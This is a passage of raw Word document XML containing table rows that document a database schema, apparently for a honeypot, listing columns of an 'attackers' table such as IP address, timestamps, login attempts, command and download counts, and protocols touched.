              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert text that was (or would have been) sent, and any error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">attackers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP address; one row per attacker across all protocols.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">first_seen, last_seen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">First and latest event from this address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sessions, events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of sessions and events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">auth_attempts, auth_success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Login attempts and successful logins.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">commands, downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell commands and captured download attempts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">protocols, devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocols and devices this attacker touched.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
